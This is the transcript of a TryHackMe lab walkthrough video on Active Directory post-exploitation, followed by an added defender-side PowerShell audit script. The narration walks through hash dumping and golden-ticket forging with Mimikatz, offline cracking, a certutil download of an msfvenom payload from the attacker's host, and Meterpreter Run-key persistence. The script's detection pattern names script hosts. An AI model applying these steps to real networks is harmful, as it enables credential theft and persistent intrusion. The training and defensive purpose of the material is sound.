Active Directory Penetration Testing with Powershell and Mimikatz - TryHackMe

Captions
Welcome back. In today's video we're going to talk about post-exploitation and enumeration; basically it is Post-Exploitation Basics from TryHackMe. As you can see I have access to the browser, but we're going to do things from our Kali machine, it is better. So basically we're going to talk about enumeration using PowerView, which is a PowerShell script from PowerShell Empire, and BloodHound for enumeration as well. So as you can see: PowerView and BloodHound for enumeration, Mimikatz for dumping password hashes and golden tickets, post-exploitation, enumerating Server Manager, and maintaining access. So you can say that this walkthrough is all about enumeration and post-exploitation. Of course we're gonna do a bonus on this video: we're gonna explore PowerShell Empire as a post-exploitation tool in addition to the tools we have seen here. So basically PowerView is an option for enumeration and BloodHound is also an option for enumeration. Of course the purpose of using PowerView and BloodHound is to escalate your privileges to be an administrator, and the same with Mimikatz: if you are dumping hashes or golden tickets with Mimikatz, your purpose is to become an administrator on the domain controller or on other domain-joined machines. So the purpose of all of that is to become an administrator or elevate privileges using post-exploitation tactics. Maintaining access is all about having a way to access the machine again in case it was shut down or logged out, or in case you want to do it later.

Okay, so let's get started. First, as you can see, there are instructions on how to do that. Basically here we have the username and password that are needed to log into the machine. So this scenario assumes that we already have exploited a target, and our next step now is to do post-exploitation and elevation of privilege. So basically I'm going to take the username Administrator and the password password123, at the domain controller controller.local. I'm going to only copy the password here. I'm gonna go back, and here we're gonna have two channels: basically I'm gonna create a new tab, split right, so one here and one here. Here I'm gonna type `sudo rdesktop -u administrator`, and of course we need to add the hosts file entry, so we type `sudo nano /etc/hosts`, and all the way down here we add the machine IP, 10249 0, and controller.local, which is the DNS name. So basically administrator, controller.local. Oh, I messed this up. Okay, yes, accept the cert. Now the password: we're gonna paste the password. No? Okay, password123... login wrong. Okay, still incorrect. Administrator... welcome? Is it the space? Let's copy the space, password123. Wow, the password is incorrect. We can try one more time. Okay, controller.local, password. Okay, I don't know why it popped up around the domain name, so I'm gonna cancel this.

So in the first scenario you have RDP access: somewhere you have managed to enable RDP on the machine and access it using Remote Desktop. So basically it's saying here: access the command prompt, cmd. And of course this is assuming that you have administrator access. So here we are Administrator. I know it kind of doesn't make sense: you are doing post-exploitation and enumeration and elevation of privilege and you're already Administrator, right? So this is just for demonstration and practice. So here we type `powershell -ep bypass`; this one is to bypass the PowerShell script execution policy. So right now we have started PowerShell here. On the other side we can also have SSH access: `ssh administrator@controller.local`. Yes. Password: let's take the password. Right now we have SSH access. So now we get started. The first thing: suppose that, as I said, we have accessed a target and we want to enumerate all of the existing users, groups, relationships, the trusts, so we can harvest and make use of all of this info to do privilege escalation. Of course we're not going to do privilege escalation on this machine since we are already administrators, but that's the purpose of the practice here.

So here we go back. PowerView has already been imported onto the target; suppose that you have downloaded it yourself. So we go to Desktop or Downloads, `ls`, we have PowerView.ps1. Of course PowerView is part of PowerShell Empire, used for enumeration. So basically here, if we open up Google, it is nice to have the commands of PowerView.ps1 ready for us to take a look at them; you're not going to be able to memorize all the commands, right? So PowerView, and here are the commands: every command has its description. You can open up the cheat sheet here and then you can see whatever fits your purpose. So basically, for example, as the scenario in TryHackMe is saying, try to find the users. So we type `Get-NetUser | select cn`. Oh, we have to start this before, okay, so we start this like that. All right, now the next thing is we type again `Get-NetUser | select`. After we run the script we're still getting this: Get-NetUser is not recognized. I go back here and type... all right, then `Get-NetUser | select cn`. Okay, here you can see we have the users: Administrator, Guest, this is the identifier for the Kerberos tickets account, Machine1, Admin2, etc. So we have enumerated the domain users. Now the domain groups: `Get-NetGroup -GroupName admin`. So it's trying to find what are the groups where the word admin is mentioned, as you can see. So here are the groups where the administrators are part of: Administrators, Hyper-V Administrators, Storage Replica Administrators, etc. So as you can see we are here finding info about the Active Directory hierarchy, the users, the groups, and most of the time our end goal is to find what are the groups that the domain admin is part of. Okay, so basically here the domain admin, if we go back to... I guess what was the... delete the domain group admin. Okay, here are the users. So sometimes Administrator is part of Domain Admins and other groups, okay, so we want to find these groups, find what are the groups that the Administrator is part of, and there might sometimes be another administrator beside the main one. So basically, as you can see, we have Admin2. We're also interested to find what are the groups Admin2 belongs to, okay, so later down the road we can create our own users and add them to one of the groups beside the admin.

So let's go back and see how we can find this, an acceptable command for this version. So basically here there is one: if we enumerate the local groups, this one enumerates the groups and this one enumerates members of a specific local group on the local machine. That's what we want. So this one here, `Get-NetLocalGroupMember`, and we specify the member. So let's first invoke the command, or copy-paste it, I hope it's gonna work. Copy-paste here doesn't work, or we can try the SSH session, way easier for copy-paste. So basically here we type... let's go back first. So on the SSH session here it's way more convenient for copy-paste actually. So paste, PowerShell, `-ep bypass`, launch the tool, and then here let's go back to the browser. Where is the browser? Okay, so `Get-NetLocalGroupMember`, let's say it is administrator, and again we get this. Wow. Okay, let's try this one: if we try like that, `-MemberIdentity`, and here we type administrator. Okay, let me cancel this. Get-DomainGroup isn't recognized as the name of a cmdlet. Okay, so it seems like I don't know what's wrong with the tool being imported on the remote host. Let's stick with the steps here.

So here the next one is asking: what is the shared folder that is not set by default? So it's asking what are the shared folders on the system here. So to find the shared folders all we have to do is to type `Invoke-ShareFinder`. So basically we have the remote admin default share, IPC, logon server, and the question is what is the shared folder that is not set by default? So for me the one that stands out is this one, share. So if we type share here, the answer is correct. Why is share the shared folder that's not set by default? As you can see there is no description here, and all of the rest are self-explanatory: all of them are default, right, except this one; the name indicates itself.

Next question: what is the operating system running inside of the network besides Windows Server 2019? So as it's indicating there is another operating system running. To do that all you have to do is to type `Get-NetComputer`. So basically we have the domain controller, DESKTOP-2 and DESKTOP-1. So what we have to do here is to find the operating system on every single one, right? The main one is Windows Server 2019; now we don't know what is the operating system running on the remaining two. So what we have to do here is `Get-NetComputer -FullData` and here we pipe to `select operatingsystem`. So yeah: Windows Server 2019, Windows 10 Enterprise Evaluation, Windows 10 Enterprise Evaluation. So here we type Windows 10 Enterprise Evaluation. Okay.

"I have hidden a flag inside of the users, find it." So there is a flag inside users, let's find it. How can we find this? We don't have to navigate through the file system; all we have to do is to use `Get-NetUser`. This displays all info about the current user, which is Administrator. So basically let's find out... seems like all of the users. Look at the account description: this is the administrator account, and this is another user. I guess that was the question; let's understand the question actually: "I have hidden a flag inside of the users, find it." Okay, let's find it. "My password is mypassword123" is for which user? Okay, if we type `Get-NetUser` POST... this is for the current user, that's what I'm looking for, for the Administrator. I type this, so the same administrator here, okay, for the user POST. So the next question is "I have hidden a flag inside of the users, find it". So there's a flag inside of users, but actually the sentence is vague, right? It doesn't specify whether it's inside of a user's directory or inside of users in the sense of enumerating the users. The correct explanation of this sentence is: by enumerating all of the users you will find the flag. So basically here what we have to do is to go back and enumerate the users and find which user we need to enumerate. So we type `Get-NetUser`, I know why it's typing zero, okay, `Get-NetUser` and now we type `select`: Administrator, Guest, Machine1, Admin2, POST. This one is interesting. So to find out the info about a specific user all you have to do is the same command here and we type the name of the user, in this case it is POST, and you can see the flag is this one. So let's find the formula. The formula is having... oh, what's that? Sometimes weird things happen on my laptop. Okay, take this like that and we copy that, submit, and now it is correct.

So that was the purpose of using PowerView: PowerView is all about enumeration, you find everything about the domain, and there are more commands than you can imagine in PowerView. All you have to do is to go back here and look at these, but some of them didn't work. There is a web page, there is a link, let me grab the link; you can find this link also in the explanation of TryHackMe. So these are the commands, and as you can see the explanation: for example `Get-DomainGroup -MemberIdentity` gets all the groups a user is effectively a member of, which is very effective, you need to know that. Use an alternate credential for any function; retrieve all computer DNS hostnames. So it's all about enumeration, right? You enumerate until you find a piece of data or piece of info that you know you may use to elevate your privilege. Most of the time it is pointing or pinning down the target user whose password hash you want to find. In this case we know the Administrator user and we know that we need to find the Admin2 hash, okay.

So now the next step here is to, let's go up, enumerate with BloodHound. So basically BloodHound is two tools: BloodHound, which you install on your local system, and SharpHound, which you import into the target. SharpHound will collect the information and store it in a zip file, and then you import the zip file into BloodHound on your local machine to explore the results. So once we are logged in, okay, we can click on this button, which is for importing data, importing the graph, and basically we specify the file, which we will take from the remote host; this file will contain all of the data. Okay, so click on X and we will head back to the target. So the target is somewhere: this is SSH and the RDP is here. Okay, now we will run SharpHound and get everything ready. So basically here we're going to type... let me copy that first. Okay, doesn't want to copy. So we run SharpHound here, and then we type `Invoke-Bloodhound -CollectionMethod All -Domain controller.local` and we export everything to a zip file; according to TryHackMe the name was loot, so let's name it loot. Let's see. So the file has been exported to the Administrator folder as loot.zip with a number here. So we navigate there, or directly we see we have the loot file. All you have to do here is to transfer it: we have to transfer one file to our machine, which is loot.zip. To do that all you have to do is to run this command using scp, right; we transfer the file from the remote host to our local machine, onto this directory. I have already done this, so go and do it on your own. This is the file.

Next thing is we do the import into BloodHound. So all you have to do is to go to Import Graph, click on that and specify the file. In my case it didn't work from this interface; I had to just drag this here and drop it. So then you click on this menu and you have Queries; in the queries you have all the pre-built queries to enumerate the Active Directory in a graphical and visual way. So for example to find all admins we can click on Find all Domain Admins and we can see the domain admins. So the domain admins are, let me make this bigger: we have SQLService and we have Admin2 and Administrator. Okay, so we have three admins, one of them is the service account, which is the answer to one question on TryHackMe, which is something vulnerable: don't have any service account as administrator. Now the next one is to list all Kerberoastable accounts. What do I mean by Kerberoastable accounts? They are the accounts whose ticket-granting ticket can be harvested using Kerberoast and cracked offline. To fix this we have to specify pre-authentication to be enabled on these two accounts. So that was for BloodHound; of course you can go over all of the queries and enumerate them: find computers with unsupported operating systems, find Kerberoastable members of high value groups, so that is the member who is Kerberoastable and high value. As we can see from the list, Kerberoastable accounts and high value. Why? Because it is an admin and it is part of Administrators, Enterprise Admins, Domain Admins. Okay, that was for BloodHound.

Now the next thing is we go to Mimikatz. So basically with Mimikatz, let me make this bigger, as you all know we can run Mimikatz with this command, okay, and first we have to check the privilege, since Mimikatz requires administrative privilege to be run. If we get OK it means we have the privilege to dump the hashes: we have to type `lsadump::lsa /patch` and we have the hashes. Now what's required from TryHackMe is to find the password for an account named Machine1 and Machine2. So Machine1: this is the hash of Machine1 and this is the hash of Machine2. Now let's copy this and try to submit this here: Machine2 hash, submit, that's correct. Now we have to find the Machine1 password. To find this we have to use John the Ripper or hashcat. So we can go back; here we type sudo... we have to copy the hash first. The Machine1 hash is this one, okay. So `sudo nano machine1`, paste the hash, save it, and now `sudo hashcat`, 1000, and we put the filename machine1 and the wordlist, which is under /usr/share/wordlists, right here. Okay, now the alternative is to use John the Ripper. Okay, what else can we do with Mimikatz? We can impersonate the tickets, the golden ticket principle. We have done this before when I uploaded videos about Active Directory enumeration; I don't remember the video name, but there was one video where I did golden ticket impersonation to access other Active Directory computers. So we're gonna demonstrate that here. So the password is cracked, and where's the password? Okay, we have to do `--show`. The password is Password1; take it and we go back, paste, submit. Okay, that's also what we got. So this is for dumping the hashes.

Now golden tickets. Golden tickets is all about, instead of having the password, you impersonate the ticket of the user. If you are familiar with Kerberos, having the ticket of some user you can impersonate a login as the user or perform commands as the user. So how to do that? We need first to find the hash of the account connected to Kerberos, which is... the name of the account is the security identifier, or I don't recall the name, but this account starts with something like krbtgt. Okay, so basically we're gonna dump the hash of this account to impersonate and find the golden tickets. So we do that from Mimikatz as well. So we type `lsadump::lsa /inject /name:` and you specify the account we want to dump the hash of, the security identifier of the Kerberos ticket-granting ticket account, which is krbtgt. So we type krbtgt and let's see what we have here. So we have this identifier, which is the SID, it's going to be needed, and we have the account name, the identifier of the Kerberos ticket-granting ticket account, and we have its hash. So to create, or to find, the golden ticket, the command is also specified. So we type `kerberos::golden` and then we specify the user: which user do I want to dump the ticket-granting ticket for? Let's say we are a non-administrative user, something like Machine1 or Machine2, and we want to dump the ticket-granting tickets.

Okay, now since we have found the password of one user, which was Password1, let's log in and simulate this behavior from a realistic scenario: `sudo evil-winrm -i controller.local -u`... the username was something like Machine1, I remember it was with a big M, I think it's Machine1, `-p`... let's log in as this user and perform the golden ticket attack. Of course this depends on whether Machine1 can run Mimikatz; if it can't, we can't use this, or we can't dump the golden ticket of the administrator starting from Machine1. And I guess we can't even WinRM, I guess. Let's try RDP instead. So `sudo rdesktop -u machine1`, the hostname will be controller. So another session now; take this and don't forget to replace this, because controller... okay, the password is, you have it, Password1. Oh no, copy-paste... I remembered. So Password1. "To sign in remotely you need the right to sign in through Remote Desktop Services. By default members of the Administrators group have this right." Okay, oh, we can't sign in. Okay, so Machine1 is not a member of the Remote Desktop right, that's why it can't sign in. So basically if you go to BloodHound and find "Find Workstations where Domain Users can RDP", select the Domain Users group. No data. Let's see, something has to do with RDP. I guess Administrator is the only user; let's find out from here. Let's go back to our old session and from here we click on... where was this? Nope. So here we have the users, groups, so RDP users... where is the group? Let me check on Machine1 properties, Member Of: Domain Users. Let's check on Admin1, Admin2, Member Of: Administrators. Yes, so admins, we can do that.

So basically let's find the password of Admin2 and log in as Admin2 to perform the golden ticket from a realistic point of view. Basically go back here and we find the hash of Admin2. So Admin2, the NTLM hash is this one; take it and go back, `sudo nano admin2`, paste the hash, and then run hashcat on admin2. Exhausted: it didn't work on Admin2, so we can change its password, no problem. Okay, so Admin2 properties, let's reset the password, put something simple like admin2, thm... I don't want a complex password, since a complex password will be hard to remember or will be hard to copy-paste. So let me type... what kind of password policy does it have? Let me see here: a password that is not... reset, right? Oh god, come on, this is very draining sometimes. It feels very... to do this... two three four 2 f 4, ad3 0 0 2 3 4 2 f4, finally, okay. Now let's do that and log in as Admin2. So here type admin2, right, controller, the password. Okay, so what we will do here: we will simulate the case where you have access to a machine and the user was not the original administrator of the domain controller. Admin2 is an admin, I know that, but it is not the original admin, and we will create the golden ticket now, and after creating the golden ticket we will be impersonating the original admin in this session. So here we type cmd. Okay, now it's going to take ages to run. What do you mean there is no cmd in the system? I mean that's ridiculous; if I type cmd again it's not going to find it, or what? Run. Okay, so the command prompt here. I'm going to go back directly: `cd Users`, `cd Admin2`, `cd Administrator`, because Mimikatz is there. Access denied, okay, we need the tool here actually. `cd Admin`... all right, so I'm going to cancel the session since the tool is not imported into Admin2, so I'm gonna stick with Admin1. Okay, let's continue on with the golden ticket now.

So we go back, where was that? Okay, so after we run the module we can see this ID and we can see here the NTLM hash and the account. Now the rest is to run the command, okay. So basically we go down and here we specify the user that we will be impersonating. So in my case I am the Administrator here, okay; I'm gonna suppose that we want to impersonate Admin2 on the system. So we type here admin2 and type the domain, which is controller.local, SID: now this ID, take it from here, okay, and then we type `/id`. Let's go up, no, go down. So most probably the ID is the ID of the user actually, which we need, right? I go back here. So basically we need the ID of the Admin2 user, so we go back and we type `wmic useraccount get name,sid`: you get a list of all the users and their SIDs, and of course we get the IDs. So basically the ID here is this line: Administrator has the ID of 500, Admin2 has the ID of 1105. So 1105. And it gives us the missing arguments: missing krbtgt key argument. So I have a missing argument here; let's find out: user, domain, and this ID... oh, and we forgot the account actually. So the account, the krbtgt account, okay. So basically the account, we take this from all the way up, which is the account hash. The account hash is this one, so take it and go down, paste it here. So now as you can see the ticket-granting ticket has been... as you can see, final ticket saved to file. Now we can access the computer of Admin2, or the desktop of Admin2, right? We are now the administrator. Let's access Admin2, sorry, type `misc::cmd`, right? So what do we have here... let's start doing that. So basically what we can do here, we can type... oh, we need the backslash, I don't have it on my keyboard, so for example type like that. And before that we want to find the computers, what other computers we have. So basically we go down, Active Directory, and we're going to use again PowerView, right, to find the computers: `Get-NetComputer`. So say we want to access DESKTOP-2, right? Let's go back. Okay, so from here I'm gonna be attempting to access DESKTOP-2. Let's take the backslash first: `\\DESKTOP-2 cmd.exe`. So we have a problem now: oh, we forgot to type the tool actually. So basically here, after Mimikatz, we can exit Mimikatz, or from another prompt, from here let's say we're going to type `psexec \\DESKTOP-2 cmd.exe`, and PsExec we don't have it, so I'm gonna move PsExec now to the desktop. Right, again we go back, type my IP again: so my IP is like that, look how easy it is, I want to memorize 10.9..., and then we type 8000; the tool name is PsExec. Now let's run PsExec and the computer name, the backslash, DESKTOP-2, yep, and then we type cmd.exe, meaning that we want to access a command prompt on the computer DESKTOP-2. I agree. Couldn't access DESKTOP-2: the share is enabled? Well, this is weird. Let's try DESKTOP-1. Well, let's try accessing some other share or some other command on that computer; so let's say dir, and here you go again, the backslash, wasting more time on backslashes. Okay, say C$ as proposed by TryHackMe. The network path couldn't be found, so I'm not sure if the ticket-granting ticket was generated successfully, or the golden ticket has been generated successfully, since it's saying final ticket saved to file. Okay, let's do that: so if you type here for the Administrator account, and here we change the user, so now we generate a golden ticket for the Administrator, `misc::cmd`, and here we have a new command prompt, okay. So here we try again: the network path cannot be found. Now we have here three, I guess. So in this one, Administrator, if we try to access C$, hmm. So for some reason I'm not able to spawn cmd.exe on other computers, so I'm gonna skip this; I just have to type the correct answer and we're gonna go on with the rest.

Okay, so here you enumerate Server Manager, right, so you can see here all of the modules, the things you can do with the server, and here you can navigate to the Active Directory; we have already done this. And the question is: what tool allows you to view the event logs? Clearly self-explanatory: it's Event Viewer. Now, what is the SQLService password? If you remember, this account is a service account that is an admin, and to get the password all we have to do is to go to Active Directory, or from here, okay, I don't want this, so basically here we type Active and see a list of users. As you can see the SQLService has its password in the description, so you click on Properties. You're not gonna find this in the real world of course; that's for the sake of answering the questions. So the password is... submit. Okay, now what's next? Next is maintaining access.

So here we have to use Metasploit, so first we generate... let's do that. So persistence is all about having or maintaining access to the machine, okay. So one way to do that is to change the password of one of these users; so now we have access, we can change the password, or we have already got the password hashes for the users, we can keep them and log in whenever we want. Now the alternative is to use Metasploit to generate a payload, transfer it over and run it, and then run the persistence module. So we can launch again the command line. I'm going to keep this up, so split the view, okay. So `msfvenom`, windows, which is the hardest to memorize, IP address 9.2..., shell... let's go back and do this from the command line. So this is the target; now here we will download: `certutil -urlcache -f http://...132.252...`. So now it's being downloaded. Let's launch a listener now: msfconsole, okay, now `use exploit`... oh no, no s... oh, I just memorized my IP address, okay, yes, but I messed other things up; set LPORT, okay, set AutoRunScript post/windows/..., run, handler failed to bind; again I messed up my IP address, nine one two two five two, done. Okay, so here execute the payload and we have received the Meterpreter session. Now for persistence, to maintain access, as I mentioned guys, the password harvest is one way; the second way is we use a module from Metasploit called local persistence. So we say `background`, `use exploit/windows/local/persistence`, `show options`, no payload configured, defaulting to windows/meterpreter, okay fine. So here we define the session, `set SESSION 1`, right, and here you see the IP; change this or keep it if it is a public IP, keep it as it changes to the public IP; in my case I'm going to change this to the actual IP I have on the VPN connection, and I hit run. So as you can see the autorun now has been installed on this registry key. If we go down to our desktop access and we inspect the registry, it's saying in Microsoft, the current user; so basically current user, HKCU, Software\Microsoft and then CurrentVersion\Run. As you can see guys, this is the debugger, modify: this is the Visual Basic script that's maintaining your access. Every time this computer boots up this Visual Basic script will run and maintain your access. That's another way.

Now let me tell you about PowerShell Empire. For PowerShell Empire we're going to do a separate video; I'm not going to do it this time. We're going to do this in a separate video to lay down all of the PowerShell Empire basics. Basically it's a post-exploitation framework, as you all know. So that was it. For PowerShell Empire we're gonna be dedicating a separate video with a practical scenario; we're going to go through all of the modules, all of the listeners, the stagers, post-exploitation tactics, stealth tactics, in the upcoming videos. So stay tuned, I hope you find this video enjoyable and we see you in the next video.
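The following PowerShell script is an added, defender-side example; it is not part of the video or of the TryHackMe room. It audits the weaknesses the walkthrough surfaces with BloodHound and Server Manager (accounts with Kerberos pre-authentication disabled, service accounts that sit in Domain Admins, and passwords left in account descriptions, as with SQLService) and then lists the Run-key autoruns the Metasploit persistence module writes to, flagging entries that look like script-based persistence. It assumes the RSAT ActiveDirectory module is installed and that it runs from a domain-joined machine with read access to the directory; the domain name controller.local is taken from the video, and the regular expressions are my own heuristics rather than anything from the room.

```powershell
# Added example, not from the video: a defender-side hygiene audit for the issues
# the walkthrough demonstrates. Assumes the RSAT ActiveDirectory module and a
# domain-joined account with read access to the directory.
Import-Module ActiveDirectory

$Domain = 'controller.local'   # domain from the video; adjust for your environment

function Get-AdHygieneFindings {
    param([string]$Server = $Domain)

    # 1. Accounts with pre-authentication disabled (what the BloodHound query flagged).
    #    Remediation: Set-ADAccountControl -Identity <user> -DoesNotRequirePreAuth $false
    Get-ADUser -Server $Server -Filter { DoesNotRequirePreAuth -eq $true } -Properties DoesNotRequirePreAuth |
        ForEach-Object {
            [pscustomobject]@{ Finding = 'PreAuthDisabled'; Account = $_.SamAccountName; Detail = 'Re-enable Kerberos pre-authentication' }
        }

    # 2. Service accounts (accounts carrying an SPN) that are members of Domain Admins.
    Get-ADGroupMember -Server $Server -Identity 'Domain Admins' -Recursive |
        Where-Object { $_.objectClass -eq 'user' } |
        ForEach-Object { Get-ADUser -Server $Server -Identity $_.distinguishedName -Properties ServicePrincipalName } |
        Where-Object { $_.ServicePrincipalName.Count -gt 0 } |
        ForEach-Object {
            [pscustomobject]@{ Finding = 'ServiceAccountInDomainAdmins'; Account = $_.SamAccountName; Detail = ($_.ServicePrincipalName -join ';') }
        }

    # 3. Descriptions that look like they carry a credential (the SQLService case).
    Get-ADUser -Server $Server -Filter 'Description -like "*"' -Properties Description |
        Where-Object { $_.Description -match '(?i)pass(word|wd)?|pwd|secret' } |
        ForEach-Object {
            [pscustomobject]@{ Finding = 'PasswordInDescription'; Account = $_.SamAccountName; Detail = $_.Description }
        }
}

function Get-RunKeyEntries {
    # The keys the persistence module writes to, per the video, plus the machine-wide equivalents.
    $runKeys = @(
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    # Heuristic (my own): a script host or shell launching something from a user-writable path.
    $pattern = '(?i)(wscript|cscript|mshta|powershell|cmd\.exe).*(\\temp\\|\\appdata\\|\\users\\public\\|\.vbs|\.js|\.ps1)'
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        foreach ($prop in $item.PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }   # skip PSPath, PSChildName and friends
            [pscustomobject]@{
                Key        = $key
                Name       = $prop.Name
                Command    = [string]$prop.Value
                Suspicious = [bool]([string]$prop.Value -match $pattern)
            }
        }
    }
}

Get-AdHygieneFindings | Format-Table -AutoSize
Get-RunKeyEntries | Where-Object Suspicious | Format-Table -AutoSize
```

Run it as an ordinary domain user for the directory checks and as a local administrator on each host whose Run keys you want to read; the directory part only reads attributes, so the remediation cmdlet is left in a comment rather than executed. Treat a flagged Run-key entry as a lead to investigate (confirm the script's contents and who created it) rather than as proof of compromise, since legitimate software occasionally launches scripts from AppData too.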
Info
Channel: Motasem Hamdan
Views: 5,763
Keywords: powershell, windows, pentesting, metasploit
Id: V3BkyAcYjPU
Length: 66min 21sec (3981 seconds)
Published: Wed Nov 11 2020